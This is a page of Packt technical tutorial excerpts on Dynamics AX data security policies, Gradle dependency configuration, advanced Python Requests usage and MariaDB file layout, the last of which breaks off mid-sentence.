This article is written by Ahmed Mohamed Rafik Moustafa, the author of Microsoft Dynamics AX 2012 R3 Security. In any corporation, some users are restricted to work with specific sensitive data because of its confidentiality or company policies, and this type of data access authorization can be managed using extensible data security (XDS). XDS is the evolution of the record-level security (RLS) that was available in the previous versions of Microsoft Dynamics AX. Also, Microsoft keeps the RLS in version AX 2012, so you can refer to it at any time. The topics that will be covered in this article are as follows: The main concepts of XDS policies Designing and developing the XDS policy Creating the XDS policy Adding constrained tables and views Setting the XDS policy context Debugging the XDS policy (For more resources related to this topic, see here.) The main concepts of XDS policies When developing an XDS policy, you need to be familiar with the following concepts: Concept Description Constrained tables A constrained table is the table or tables in a given security policy from which data is filtered or secured, based on the associated policy query. Primary tables A primary table is used to secure the content of the related constrained table. Policy queries A policy query is used to secure the constrained tables specified in a given extensible data security policy. Policy context A policy context is a piece of information that controls the circumstances under which a given policy is considered to be applicable. If this context is not set, then the policy, even if enabled, is not enforced. After understanding the previous concepts of XDS, we move on to the four steps to develop an XDS policy, and they are as follows: Design the query on the primary tables. Develop the policy. Add the constrained tables and views. Set up the policy context. Designing and developing the XDS policy XDS is a powerful mechanism that allows us to express and implement data security needs. The following steps show detailed instructions on designing and developing XDS: Determine the primary table; for example, VendTable. Create a query under the AOT Queries node:     Use VendTable as the first data source     Add other data sources as required by the vendor data model: Creating the policy Now we have to create the policy itself. Follow these steps: Right-click on AOT and go to Security | Policies. Select New Security Policy. Adjust the PrimaryTable property on the policy to VendTable. Settle the Query property on the policy to VendProfileAccountPolicy. Adjust the PolicyGroup property to Vendor Self Service. Settle the ConstrainedTable property to Yes to secure the primary table using this policy. Adjust the Enabled property to Yes or No, depending on whether or not you want to control the policy. Settle the ContextType property to one of the following:     ContextString: Adjust the property to this value if a global context is to be used with the policy. After using ContextString, it needs to be set by the application using the XDS::SetContext API.     RoleName: Adjust the property to this value if the policy should be applied only if a user in a specific role needs to access the constrained tables.     RoleProperty: Adjust the property to this value if the policy is to be applied only if the user is a member of any one of roles that have the ContextString property settled to the same value. The following screenshot displays the properties: Adding constrained tables and views After designing the query and developing the required policy, the next step is to add the constrained tables and views that contain the data by using the created policy. By following the next steps, you will be able to add constrained tables or views: Right-click on the Constrained Tables node. Go to New | Add table to add a constrained table; for example, the AssetBook table, as shown in the following screenshot: When adding the constrained table AssetBook, you must determine the relationship that should be used to join the primary table with the last constrained table. Go to New | Add View to add a constrained view to the selected policy. Repeat these steps for every constrained table or view that needs to be secured through this policy. After finishing these steps, the policy will be applied for all users who are attempting to access the tables or views that are located on the constrained table's node when the Enabled property is set to Yes. Security policies are not applied to system administrators who are in the SysAdmin role. Setting the XDS policy context According to the requirements, the security policy needs to be adjusted to apply only to the users who were assigned to the vendor role. The following steps should be performed to make the appropriate adjustment: Adjust the ContextType property on the policy node to RoleProperty. Settle the ContextString property on the policy node to ForAllVendorRoles: To assign this policy to all the vendor roles, the ForAllVendorRoles context should be applied to the appropriate roles: Locate each role that needs to be assigned to this policy on the AOT node; for example, the VendVendor role. Adjust the ContextString property on the VendVendor role to ForAllVendorRoles: For more information, go to MSDN and refer to Whitepapers – Developing Extensible Data Security Policies at https://msdn.microsoft.com/en-us/library/bb629286.aspx. Debugging XDS policies One of the most common issues reported when a new XDS policy is deployed is that an unexpected number of rows are being returned from a given constrained table. For example, more sales orders are being returned than expected if the sales order table is being constrained by a given customer group. XDS provides a method to debug these errors. We will go over it now. Review the SQL queries that have been generated. The X++ select has been extended with a command that instructs the underlying data access framework to generate the SQL query without actually executing it. The following job runs a select query on SalesTable with a generated command. It then calls the getSQLStatement() method on SalesTable and dumps the output using the info API. static void VerifySalesQuery(Args _args) { SalesTable salesTable; XDSServices xdsServices = new XDSServices(); xdsServices.setXDSContext(1, ''); //Only generate SQL statement for custGroup table select generateonly forceLiterals CustAccount, DeliveryDate from salesTable; //Print SQL statement to infolog info(salesTable.getSQLStatement()); xdsServices.setXDSContext(2, ''); } The XDS policy development framework further eases this process of doing some advanced debugging by storing the query in a human-readable form. This query and others on a given constrained table in a policy can be retrieved by using the following Transact-SQL query on the database in the development environment (AXDBDEV in this example): SELECT [PRIMARYTABLEAOTNAME], [QUERYOBJECTAOTNAME], [CONSTRAINEDTABLE], [MODELEDQUERYDEBUGINFO], [CONTEXTTYPE],[CONTEXTSTRING], [ISENABLED], [ISMODELED] FROM [AXDBDEV].[dbo].[ModelSecPolRuntimeEx] This SQL query generates the following output: As you can see, the query that will join the WHERE statement of any query to the AssetBook table will be ready for debugging. Other metadata, such as LayerId, can be debugged if needed. When multiple policies apply to a table, the results of the policies are linked together with AND operators. Summary By the end of this article, you are able to secure your sensitive data using the XDS features. We learned how to design and develop XDS policies, constrained tables and views, primary tables, policy queries, set the security context, run SQL queries and learned how to debug XDS policies. Resources for Article: Further resources on this subject: Understanding and Creating Simple SSRS Reports [article] Working with Data in Forms [article] Learning MS Dynamics AX 2012 Programming [article]
Read more
  • 0
  • 0
  • 3644

article-image-defining-dependencies
Packt
16 Jun 2015
14 min read
Save for later

Defining Dependencies

Packt
16 Jun 2015
14 min read
In this article by Hubert Klein Ikkink, author of the book Gradle Dependency Management, you are going to learn how to define dependencies in your Gradle project. We will see how we can define the configurations of dependencies. You will learn about the different dependency types in Gradle and how to use them when you configure your build. When we develop software, we need to write code. Our code consists of packages with classes, and those can be dependent on the other classes and packages in our project. This is fine for one project, but we sometimes depend on classes in other projects we didn't develop ourselves, for example, we might want to use classes from an Apache Commons library or we might be working on a project that is part of a bigger, multi-project application and we are dependent on classes in these other projects. Most of the time, when we write software, we want to use classes outside of our project. Actually, we have a dependency on those classes. Those dependent classes are mostly stored in archive files, such as Java Archive (JAR) files. Such archive files are identified by a unique version number, so we can have a dependency on the library with a specific version. (For more resources related to this topic, see here.) Declaring dependency configurations In Gradle, we define dependency configurations to group dependencies together. A dependency configuration has a name and several properties, such as a description and is actually a special type of FileCollection. Configurations can extend from each other, so we can build a hierarchy of configurations in our build files. Gradle plugins can also add new configurations to our project, for example, the Java plugin adds several new configurations, such as compile and testRuntime, to our project. The compile configuration is then used to define the dependencies that are needed to compile our source tree. The dependency configurations are defined with a configurations configuration block. Inside the block, we can define new configurations for our build. All configurations are added to the project's ConfigurationContainer object. In the following example build file, we define two new configurations, where the traffic configuration extends from the vehicles configuration. This means that any dependency added to the vehicles configuration is also available in the traffic configuration. We can also assign a description property to our configuration to provide some more information about the configuration for documentation purposes. The following code shows this: // Define new configurations for build.configurations {// Define configuration vehicles.vehicles {description = 'Contains vehicle dependencies'}traffic {extendsFrom vehiclesdescription = 'Contains traffic dependencies'}} To see which configurations are available in a project, we can execute the dependencies task. This task is available for each Gradle project. The task outputs all the configurations and dependencies of a project. Let's run this task for our current project and check the output: $ gradle -q dependencies------------------------------------------------------------Root project------------------------------------------------------------traffic - Contains traffic dependenciesNo dependenciesvehicles - Contains vehicle dependenciesNo dependencies Note that we can see our two configurations, traffic and vehicles, in the output. We have not defined any dependencies to these configurations, as shown in the output. The Java plugin adds a couple of configurations to a project, which are used by the tasks from the Java plugin. Let's add the Java plugin to our Gradle build file: apply plugin: 'java' To see which configurations are added, we invoke the dependencies task and look at the output: $ gradle -q dependencies------------------------------------------------------------Root project------------------------------------------------------------archives - Configuration for archive artifacts.No dependenciescompile - Compile classpath for source set 'main'.No dependenciesdefault - Configuration for default artifacts.No dependenciesruntime - Runtime classpath for source set 'main'.No dependenciestestCompile - Compile classpath for source set 'test'.No dependenciestestRuntime - Runtime classpath for source set 'test'.No dependencies We see six configurations in our project just by adding the Java plugin. The archives configuration is used to group the artifacts our project creates. The other configurations are used to group the dependencies for our project. In the following table, the dependency configurations are summarized: Name Extends Description compile none These are dependencies to compile. runtime compile These are runtime dependencies. testCompile compile These are extra dependencies to compile tests. testRuntime runtime, testCompile These are extra dependencies to run tests. default runtime These are dependencies used by this project and artifacts created by this project. Declaring dependencies We defined configurations or applied a plugin that added new configurations to our project. However, a configuration is empty unless we add dependencies to the configuration. To declare dependencies in our Gradle build file, we must add the dependencies configuration block. The configuration block will contain the definition of our dependencies. In the following example Gradle build file, we define the dependencies block: // Dependencies configuration block.dependencies {// Here we define our dependencies.} Inside the configuration block, we use the name of a dependency configuration followed by the description of our dependencies. The name of the dependency configuration can be defined explicitly in the build file or can be added by a plugin we use. In Gradle, we can define several types of dependencies. In the following table, we will see the different types we can use: Dependency type Description External module dependency This is a dependency on an external module or library that is probably stored in a repository. Client module dependency This is a dependency on an external module where the artifacts are stored in a repository, but the meta information about the module is in the build file. We can override meta information using this type of dependency. Project dependency This is a dependency on another Gradle project in the same build. File dependency This is a dependency on a collection of files on the local computer. Gradle API dependency This is a dependency on the Gradle API of the current Gradle version. We use this dependency when we develop Gradle plugins and tasks. Local Groovy dependency This is a dependency on the Groovy libraries used by the current Gradle version. We use this dependency when we develop Gradle plugins and tasks. External module dependencies External module dependencies are the most common dependencies in projects. These dependencies refer to a module in an external repository. Later in the article, we will find out more about repositories, but basically, a repository stores modules in a central location. A module contains one or more artifacts and meta information, such as references to the other modules it depends on. We can use two notations to define an external module dependency in Gradle. We can use a string notation or a map notation. With the map notation, we can use all the properties available for a dependency. The string notation allows us to set a subset of the properties but with a very concise syntax. In the following example Gradle build file, we define several dependencies using the string notation: // Define dependencies.dependencies {// Defining two dependencies.vehicles 'com.vehicles:car:1.0', 'com.vehicles:truck:2.0'// Single dependency.traffic 'com.traffic:pedestrian:1.0'} The string notation has the following format: moduleGroup:moduleName:version. Before the first colon, the module group name is used, followed by the module name, and the version is mentioned last. If we use the map notation, we use the names of the attributes explicitly and set the value for each attribute. Let's rewrite our previous example build file and use the map notation: // Compact definition of configurations.configurations {vehiclestraffic.extendsFrom vehicles}// Define dependencies.dependencies {// Defining two dependencies.vehicles([group: 'com.vehicles', name: 'car', version: '1.0'],[group: 'com.vehicles', name: 'truck', version: '2.0'],)// Single dependency.traffic group: 'com.traffic', name: 'pedestrian', version:'1.0'} We can specify extra configuration attributes with the map notation, or we can add an extra configuration closure. One of the attributes of an external module dependency is the transitiveattribute. In the next example build file, we will set this attribute using the map notation and a configuration closure: dependencies {// Use transitive attribute in map notation.vehicles group: 'com.vehicles', name: 'car',version: '1.0', transitive: false// Combine map notation with configuration closure.vehicles(group: 'com.vehicles', name: 'car', version: '1.0') {transitive = true}// Combine string notation with configuration closure.traffic('com.traffic:pedestrian:1.0') {transitive = false}} Once of the advantages of Gradle is that we can write Groovy code in our build file. This means that we can define methods and variables and use them in other parts of our Gradle file. This way, we can even apply refactoring to our build file and make maintainable build scripts. Note that in our examples, we included multiple dependencies with the com.vehicles group name. The value is defined twice, but we can also create a new variable with the group name and reference of the variable in the dependencies configuration. We define a variable in our build file inside an ext configuration block. We use the ext block in Gradle to add extra properties to an object, such as our project. The following sample code defines an extra variable to hold the group name: // Define project property with// dependency group name 'com.vehicles'ext {groupNameVehicles = 'com.vehicles'}dependencies {// Using Groovy string support with// variable substition.vehicles "$groupNameVehicles:car:1.0"// Using map notation and reference// property groupNameVehicles.vehicles group: groupNameVehicles, name: 'truck', version:'2.0'} If we define an external module dependency, then Gradle tries to find a module descriptor in a repository. If the module descriptor is available, it is parsed to see which artifacts need to be downloaded. Also, if the module descriptor contains information about the dependencies needed by the module, those dependencies are downloaded as well. Sometimes, a dependency has no descriptor in the repository, and it is only then that Gradle downloads the artifact for that dependency. A dependency based on a Maven module only contains one artifact, so it is easy for Gradle to know which artifact to download. But for a Gradle or Ivy module, it is not so obvious, because a module can contain multiple artifacts. The module will have multiple configurations, each with different artifacts. Gradle will use the configuration with the name default for such modules. So, any artifacts and dependencies associated with the default configuration are downloaded. However, it is possible that the default configuration doesn't contain the artifacts we need. We, therefore, can specify the configuration attribute for the dependency configuration to specify a specific configuration that we need. The following example defines a configuration attribute for the dependency configuration: dependencies {// Use the 'jar' configuration defined in the// module descriptor for this dependency.traffic group: 'com.traffic',name: 'pedestrian',version: '1.0',configuration: 'jar'} When there is no module descriptor for a dependency, only the artifact is downloaded by Gradle. We can use an artifact-only notation if we only want to download the artifact for a module with a descriptor and not any dependencies. Or, if we want to download another archive file, such as a TAR file, with documentation, from a repository. To use the artifact-only notation, we must add the file extension to the dependency definition. If we use the string notation, we must add the extension prefixed with an @ sign after the version. With the map notation, we can use the ext attribute to set the extension. If we define our dependency as artifact-only, Gradle will not check whether there is a module descriptor available for the dependency. In the next build file, we will see examples of the different artifact-only notations: dependencies {// Using the @ext notation to specify// we only want the artifact for this// dependency.vehicles 'com.vehicles:car:2.0@jar'// Use map notation with ext attribute// to specify artifact only dependency.traffic group: 'com.traffic', name: 'pedestrian',version: '1.0', ext: 'jar'// Alternatively we can use the configuration closure.// We need to specify an artifact configuration closure// as well to define the ext attribute.vehicles('com.vehicles:car:2.0') {artifact {name = 'car-docs'type = 'tar'extension = 'tar'}}} A Maven module descriptor can use classifiers for the artifact. This is mostly used when a library with the same code is compiled for different Java versions, for example, a library is compiled for Java 5 and Java 6 with the jdk15 and jdk16 classifiers. We can use the classifier attribute when we define an external module dependency to specify which classifier we want to use. Also, we can use it in a string or map notation. With the string notation, we add an extra colon after the version attribute and specify the classifier. For the map notation, we can add the classifier attribute and specify the value we want. The following build file contains an example of the different definitions of a dependency with a classifier: dependencies {// Using string notation we can// append the classifier after// the version attribute, prefixed// with a colon.vehicles 'com.vehicles:car:2.0:jdk15'// With the map notation we simply use the// classifier attribute name and the value.traffic group: 'com.traffic', name: 'pedestrian',version: '1.0', classifier: 'jdk16'// Alternatively we can use the configuration closure.// We need to specify an artifact configuration closure// as well to define the classifier attribute.vehicles('com.vehicles:truck:2.0') {artifact {name = 'truck'type = 'jar'classifier = 'jdk15'}}} Defining client module dependencies When we define external module dependencies, we expect that there is a module descriptor file with information about the artifacts and dependencies for those artifacts. Gradle will parse this file and determine what needs to be downloaded. Remember that if such a file is not available on the artifact, it will be downloaded. However, what if we want to override the module descriptor or provide one if it is not available? In the module descriptor that we provide, we can define the dependencies of the module ourselves. We can do this in Gradle with client module dependencies. Instead of relying on a module descriptor in a repository, we define our own module descriptor locally in the build file. We now have full control over what we think the module should look like and which dependencies the module itself has. We use the module method to define a client module dependency for a dependency configuration. In the following example build file, we will write a client module dependency for the dependency car, and we will add a transitive dependency to the driver: dependencies {// We use the module method to instruct// Gradle to not look for the module descriptor// in a repository, but use the one we have// defined in the build file.vehicles module('com.vehicles:car:2.0') {// Car depends on driver.dependency('com.traffic:driver:1.0')}} Using project dependencies Projects can be part of a bigger, multi-project build, and the projects can be dependent on each other, for example, one project can be made dependent on the generated artifact of another project, including the transitive dependencies of the other project. To define such a dependency, we use the project method in our dependencies configuration block. We specify the name of the project as an argument. We can also define the name of a dependency configuration of the other project we depend on. By default, Gradle will look for the default dependency configuration, but with the configuration attribute, we can specify a specific dependency configuration to be used. The next example build file will define project dependencies on the car and truck projects: dependencies {// Use project method to define project// dependency on car project.vehicles project(':car')// Define project dependency on truck// and use dependency configuration api// from that project.vehicles project(':truck') {configuration = 'api'}// We can use alternative syntax// to specify a configuration.traffic project(path: ':pedestrian',configuration: 'lib')} Summary In this article, you learned how to create and use dependency configurations to group together dependencies. We saw how to define several types of dependencies, such as external module dependency and internal dependencies. Also, we saw how we can add dependencies to code in Gradle build scripts with the classpath configuration and the buildscript configuration. Finally, we looked at some maintainable ways of defining dependencies using code refactoring and the external dependency management plugin. Resources for Article: Further resources on this subject: Dependency Management in SBT [Article] Apache Maven and m2eclipse [Article] AngularJS Web Application Development Cookbook [Article]
Read more
  • 0
  • 0
  • 1800

article-image-digging-deep-requests
Packt
16 Jun 2015
17 min read
Save for later

Digging Deep into Requests

Packt
16 Jun 2015
17 min read
In this article by Rakesh Vidya Chandra and Bala Subrahmanyam Varanasi, authors of the book Python Requests Essentials, we are going to deal with advanced topics in the Requests module. There are many more features in the Requests module that makes the interaction with the web a cakewalk. Let us get to know more about different ways to use Requests module which helps us to understand the ease of using it. (For more resources related to this topic, see here.) In a nutshell, we will cover the following topics: Persisting parameters across requests using Session objects Revealing the structure of request and response Using prepared requests Verifying SSL certificate with Requests Body Content Workflow Using generator for sending chunk encoded requests Getting the request method arguments with event hooks Iterating over streaming API Self-describing the APIs with link headers Transport Adapter Persisting parameters across Requests using Session objects The Requests module contains a session object, which has the capability to persist settings across the requests. Using this session object, we can persist cookies, we can create prepared requests, we can use the keep-alive feature and do many more things. The Session object contains all the methods of Requests API such as GET, POST, PUT, DELETE and so on. Before using all the capabilities of the Session object, let us get to know how to use sessions and persist cookies across requests. Let us use the session method to get the resource. >>> import requests >>> session = requests.Session() >>> response = requests.get("https://google.co.in", cookies={"new-cookie-identifier": "1234abcd"}) In the preceding example, we created a session object with requests and its get method is used to access a web resource. The cookie value which we had set in the previous example will be accessible using response.request.headers. >>> response.request.headers CaseInsensitiveDict({'Cookie': 'new-cookie-identifier=1234abcd', 'Accept-Encoding': 'gzip, deflate, compress', 'Accept': '*/*', 'User-Agent': 'python-requests/2.2.1 CPython/2.7.5+ Linux/3.13.0-43-generic'}) >>> response.request.headers['Cookie'] 'new-cookie-identifier=1234abcd' With session object, we can specify some default values of the properties, which needs to be sent to the server using GET, POST, PUT and so on. We can achieve this by specifying the values to the properties like headers, auth and so on, on a Session object. >>> session.params = {"key1": "value", "key2": "value2"} >>> session.auth = ('username', 'password') >>> session.headers.update({'foo': 'bar'}) In the preceding example, we have set some default values to the properties—params, auth, and headers using the session object. We can override them in the subsequent request, as shown in the following example, if we want to: >>> session.get('http://mysite.com/new/url', headers={'foo': 'new-bar'}) Revealing the structure of request and response A Requests object is the one which is created by the user when he/she tries to interact with a web resource. It will be sent as a prepared request to the server and does contain some parameters which are optional. Let us have an eagle eye view on the parameters: Method: This is the HTTP method to be used to interact with the web service. For example: GET, POST, PUT. URL: The web address to which the request needs to be sent. headers: A dictionary of headers to be sent in the request. files: This can be used while dealing with the multipart upload. It's the dictionary of files, with key as file name and value as file object. data: This is the body to be attached to the request.json. There are two cases that come in to the picture here: If json is provided, content-type in the header is changed to application/json and at this point, json acts as a body to the request. In the second case, if both json and data are provided together, data is silently ignored. params: A dictionary of URL parameters to append to the URL. auth: This is used when we need to specify the authentication to the request. It's a tuple containing username and password. cookies: A dictionary or a cookie jar of cookies which can be added to the request. hooks: A dictionary of callback hooks. A Response object contains the response of the server to a HTTP request. It is generated once Requests gets a response back from the server. It contains all of the information returned by the server and also stores the Request object we created originally. Whenever we make a call to a server using the requests, two major transactions are taking place in this context which are listed as follows: We are constructing a Request object which will be sent out to the server to request a resource A Response object is generated by the requests module Now, let us look at an example of getting a resource from Python's official site. >>> response = requests.get('https://python.org') In the preceding line of code, a requests object gets constructed and will be sent to 'https://python.org'. Thus obtained Requests object will be stored in the response.request variable. We can access the headers of the Request object which was sent off to the server in the following way: >>> response.request.headers CaseInsensitiveDict({'Accept-Encoding': 'gzip, deflate, compress', 'Accept': '*/*', 'User-Agent': 'python-requests/2.2.1 CPython/2.7.5+ Linux/3.13.0-43-generic'}) The headers returned by the server can be accessed with its 'headers' attribute as shown in the following example: >>> response.headers CaseInsensitiveDict({'content-length': '45950', 'via': '1.1 varnish', 'x-cache': 'HIT', 'accept-ranges': 'bytes', 'strict-transport-security': 'max-age=63072000; includeSubDomains', 'vary': 'Cookie', 'server': 'nginx', 'age': '557','content-type': 'text/html; charset=utf-8', 'public-key-pins': 'max-age=600; includeSubDomains; ..) The response object contains different attributes like _content, status_code, headers, url, history, encoding, reason, cookies, elapsed, request. >>> response.status_code 200 >>> response.url u'https://www.python.org/' >>> response.elapsed datetime.timedelta(0, 1, 904954) >>> response.reason 'OK' Using prepared Requests Every request we send to the server turns to be a PreparedRequest by default. The request attribute of the Response object which is received from an API call or a session call is actually the PreparedRequest that was used. There might be cases in which we ought to send a request which would incur an extra step of adding a different parameter. Parameters can be cookies, files, auth, timeout and so on. We can handle this extra step efficiently by using the combination of sessions and prepared requests. Let us look at an example: >>> from requests import Request, Session >>> header = {} >>> request = Request('get', 'some_url', headers=header) We are trying to send a get request with a header in the previous example. Now, take an instance where we are planning to send the request with the same method, URL, and headers, but we want to add some more parameters to it. In this condition, we can use the session method to receive complete session level state to access the parameters of the initial sent request. This can be done by using the session object. >>> from requests import Request, Session >>> session = Session() >>> request1 = Request('GET', 'some_url', headers=header) Now, let us prepare a request using the session object to get the values of the session level state: >>> prepare = session.prepare_request(request1) We can send the request object request with more parameters now, as follows: >>> response = session.send(prepare, stream=True, verify=True) 200 Voila! Huge time saving! The prepare method prepares the complete request with the supplied parameters. In the previous example, the prepare_request method was used. There are also some other methods like prepare_auth, prepare_body, prepare_cookies, prepare_headers, prepare_hooks, prepare_method, prepare_url which are used to create individual properties. Verifying an SSL certificate with Requests Requests provides the facility to verify an SSL certificate for HTTPS requests. We can use the verify argument to check whether the host's SSL certificate is verified or not. Let us consider a website which has got no SSL certificate. We shall send a GET request with the argument verify to it. The syntax to send the request is as follows: requests.get('no ssl certificate site', verify=True) As the website doesn't have an SSL certificate, it will result an error similar to the following: requests.exceptions.ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) Let us verify the SSL certificate for a website which is certified. Consider the following example: >>> requests.get('https://python.org', verify=True) <Response [200]> In the preceding example, the result was 200, as the mentioned website is SSL certified one. If we do not want to verify the SSL certificate with a request, then we can put the argument verify=False. By default, the value of verify will turn to True. Body content workflow Take an instance where a continuous stream of data is being downloaded when we make a request. In this situation, the client has to listen to the server continuously until it receives the complete data. Consider the case of accessing the content from the response first and the worry about the body next. In the above two situations, we can use the parameter stream. Let us look at an example: >>> requests.get("https://pypi.python.org/packages/source/F/Flask/Flask-0.10.1.tar.gz", stream=True) If we make a request with the parameter stream=True, the connection remains open and only the headers of the response will be downloaded. This gives us the capability to fetch the content whenever we need by specifying the conditions like the number of bytes of data. The syntax is as follows: if int(request.headers['content_length']) < TOO_LONG: content = r.content By setting the parameter stream=True and by accessing the response as a file-like object that is response.raw, if we use the method iter_content, we can iterate over response.data. This will avoid reading of larger responses at once. The syntax is as follows: iter_content(chunk_size=size in bytes, decode_unicode=False) In the same way, we can iterate through the content using iter_lines method which will iterate over the response data one line at a time. The syntax is as follows: iter_lines(chunk_size = size in bytes, decode_unicode=None, delimitter=None) The important thing that should be noted while using the stream parameter is it doesn't release the connection when it is set as True, unless all the data is consumed or response.close is executed. Keep-alive facility As the urllib3 supports the reuse of the same socket connection for multiple requests, we can send many requests with one socket and receive the responses using the keep-alive feature in the Requests library. Within a session, it turns to be automatic. Every request made within a session automatically uses the appropriate connection by default. The connection that is being used will be released after all the data from the body is read. Streaming uploads A file-like object which is of massive size can be streamed and uploaded using the Requests library. All we need to do is to supply the contents of the stream as a value to the data attribute in the request call as shown in the following lines. The syntax is as follows: with open('massive-body', 'rb') as file:    requests.post('http://example.com/some/stream/url',                  data=file) Using generator for sending chunk encoded Requests Chunked transfer encoding is a mechanism for transferring data in an HTTP request. With this mechanism, the data is sent in a series of chunks. Requests supports chunked transfer encoding, for both outgoing and incoming requests. In order to send a chunk encoded request, we need to supply a generator for your body. The usage is shown in the following example: >>> def generator(): ...     yield "Hello " ...     yield "World!" ... >>> requests.post('http://example.com/some/chunked/url/path',                  data=generator()) Getting the request method arguments with event hooks We can alter the portions of the request process signal event handling using hooks. For example, there is hook named response which contains the response generated from a request. It is a dictionary which can be passed as a parameter to the request. The syntax is as follows: hooks = {hook_name: callback_function, … } The callback_function parameter may or may not return a value. When it returns a value, it is assumed that it is to replace the data that was passed in. If the callback function doesn't return any value, there won't be any effect on the data. Here is an example of a callback function: >>> def print_attributes(request, *args, **kwargs): ...     print(request.url) ...     print(request .status_code) ...     print(request .headers) If there is an error in the execution of callback_function, you'll receive a warning message in the standard output. Now let us print some of the attributes of the request, using the preceding callback_function: >>> requests.get('https://www.python.org/',                  hooks=dict(response=print_attributes)) https://www.python.org/ 200 CaseInsensitiveDict({'content-type': 'text/html; ...}) <Response [200]> Iterating over streaming API Streaming API tends to keep the request open allowing us to collect the stream data in real time. While dealing with a continuous stream of data, to ensure that none of the messages being missed from it we can take the help of iter_lines() in Requests. The iter_lines() iterates over the response data line by line. This can be achieved by setting the parameter stream as True while sending the request. It's better to keep in mind that it's not always safe to call the iter_lines() function as it may result in loss of received data. Consider the following example taken from http://docs.python-requests.org/en/latest/user/advanced/#streaming-requests: >>> import json >>> import requests >>> r = requests.get('http://httpbin.org/stream/4', stream=True) >>> for line in r.iter_lines(): ...     if line: ...         print(json.loads(line) ) In the preceding example, the response contains a stream of data. With the help of iter_lines(), we tried to print the data by iterating through every line. Encodings As specified in the HTTP protocol (RFC 7230), applications can request the server to return the HTTP responses in an encoded format. The process of encoding turns the response content into an understandable format which makes it easy to access it. When the HTTP header fails to return the type of encoding, Requests will try to assume the encoding with the help of chardet. If we access the response headers of a request, it does contain the keys of content-type. Let us look at a response header's content-type: >>> re = requests.get('http://google.com') >>> re.headers['content-type'] 'text/html; charset=ISO-8859-1' In the preceding example the content type contains 'text/html; charset=ISO-8859-1'. This happens when the Requests finds the charset value to be None and the 'content-type' value to be 'Text'. It follows the protocol RFC 7230 to change the value of charset to ISO-8859-1 in this type of a situation. In case we are dealing with different types of encodings like 'utf-8', we can explicitly specify the encoding by setting the property to Response.encoding. HTTP verbs Requests support the usage of the full range of HTTP verbs which are defined in the following table. To most of the supported verbs, 'url' is the only argument that must be passed while using them. Method Description GET GET method requests a representation of the specified resource. Apart from retrieving the data, there will be no other effect of using this method. Definition is given as requests.get(url, **kwargs) POST The POST verb is used for the creation of new resources. The submitted data will be handled by the server to a specified resource. Definition is given as requests.post(url, data=None, json=None, **kwargs) PUT This method uploads a representation of the specified URI. If the URI is not pointing to any resource, the server can create a new object with the given data or it will modify the existing resource. Definition is given as requests.put(url, data=None, **kwargs) DELETE This is pretty easy to understand. It is used to delete the specified resource. Definition is given as requests.delete(url, **kwargs) HEAD This verb is useful for retrieving meta-information written in response headers without having to fetch the response body. Definition is given as requests.head(url, **kwargs) OPTIONS OPTIONS is a HTTP method which returns the HTTP methods that the server supports for a specified URL. Definition is given as requests.options(url, **kwargs) PATCH This method is used to apply partial modifications to a resource. Definition is given as requests.patch(url, data=None, **kwargs) Self-describing the APIs with link headers Take a case of accessing a resource in which the information is accommodated in different pages. If we need to approach the next page of the resource, we can make use of the link headers. The link headers contain the meta data of the requested resource, that is the next page information in our case. >>> url = "https://api.github.com/search/code?q=addClass+user:mozilla&page=1&per_page=4" >>> response = requests.head(url=url) >>> response.headers['link'] '<https://api.github.com/search/code?q=addClass+user%3Amozilla&page=2&per_page=4>; rel="next", <https://api.github.com/search/code?q=addClass+user%3Amozilla&page=250&per_page=4>; rel="last" In the preceding example, we have specified in the URL that we want to access page number one and it should contain four records. The Requests automatically parses the link headers and updates the information about the next page. When we try to access the link header, it showed the output with the values of the page and the number of records per page. Transport Adapter It is used to provide an interface for Requests sessions to connect with HTTP and HTTPS. This will help us to mimic the web service to fit our needs. With the help of Transport Adapters, we can configure the request according to the HTTP service we opt to use. Requests contains a Transport Adapter called HTTPAdapter included in it. Consider the following example: >>> session = requests.Session() >>> adapter = requests.adapters.HTTPAdapter(max_retries=6) >>> session.mount("http://google.co.in", adapter) In this example, we created a request session in which every request we make retries only six times, when the connection fails. Summary In this article, we learnt about creating sessions and using the session with different criteria. We also looked deeply into HTTP verbs and using proxies. We learnt about streaming requests, dealing with SSL certificate verifications and streaming responses. We also got to know how to use prepared requests, link headers and chunk encoded requests. Resources for Article: Further resources on this subject: Machine Learning [article] Solving problems – closest good restaurant [article] Installing NumPy, SciPy, matplotlib, and IPython [article]
Read more
  • 0
  • 0
  • 7908
article-image-set-mariadb
Packt
16 Jun 2015
8 min read
Save for later

Set Up MariaDB

Packt
16 Jun 2015
8 min read
In this article, by Daniel Bartholomew, author of Getting Started with MariaDB - Second Edition, you will learn to set up MariaDB with a generic configuration suitable for general use. This is perfect for giving MariaDB a try but might not be suitable for a production database application under heavy load. There are thousands of ways to tweak the settings to get MariaDB to perform just the way we need it to. Many books have been written on this subject. In this article, we'll cover enough of the basics so that we can comfortably edit the MariaDB configuration files and know our way around. The MariaDB filesystem layout A MariaDB installation is not a single file or even a single directory, so the first stop on our tour is a high-level overview of the filesystem layout. We'll start with Windows and then move on to Linux. The MariaDB filesystem layout on Windows On Windows, MariaDB is installed under a directory named with the following pattern: C:Program FilesMariaDB <major>.<minor> In the preceding command, <major> and <minor> refer to the first and second number in the MariaDB version string. So for MariaDB 10.1, the location would be: C:Program FilesMariaDB 10.1 The only alteration to this location, unless we change it during the installation, is when the 32-bit version of MariaDB is installed on a 64-bit version of Windows. In that case, the default MariaDB directory is at the following location: C:Program Files x86MariaDB <major>.<minor> Under the MariaDB directory on Windows, there are four primary directories: bin, data, lib, and include. There are also several configuration examples and other files under the MariaDB directory and a couple of additional directories (docs and Share), but we won't go into their details here. The bin directory is where the executable files of MariaDB are located. The data directory is where databases are stored; it is also where the primary MariaDB configuration file, my.ini, is stored. The lib directory contains various library and plugin files. Lastly, the include directory contains files that are useful for application developers. We don't generally need to worry about the bin, lib, and include directories; it's enough for us to be aware that they exist and know what they contain. The data directory is where we'll spend most of our time in this article and when using MariaDB. On Linux distributions, MariaDB follows the default filesystem layout. For example, the MariaDB binaries are placed under /usr/bin/, libraries are placed under /usr/lib/, manual pages are placed under /usr/share/man/, and so on. However, there are some key MariaDB-specific directories and file locations that we should know about. Two of them are locations that are the same across most Linux distributions. These locations are the /usr/share/mysql/ and /var/lib/mysql/ directories. The /usr/share/mysql/ directory contains helper scripts that are used during the initial installation of MariaDB, translations (so we can have error and system messages in different languages), and character set information. We don't need to worry about these files and scripts; it's enough to know that this directory exists and contains important files. The /var/lib/mysql/ directory is the default location for our actual database data and the related files such as logs. There is not much need to worry about this directory as MariaDB will handle its contents automatically; for now it's enough to know that it 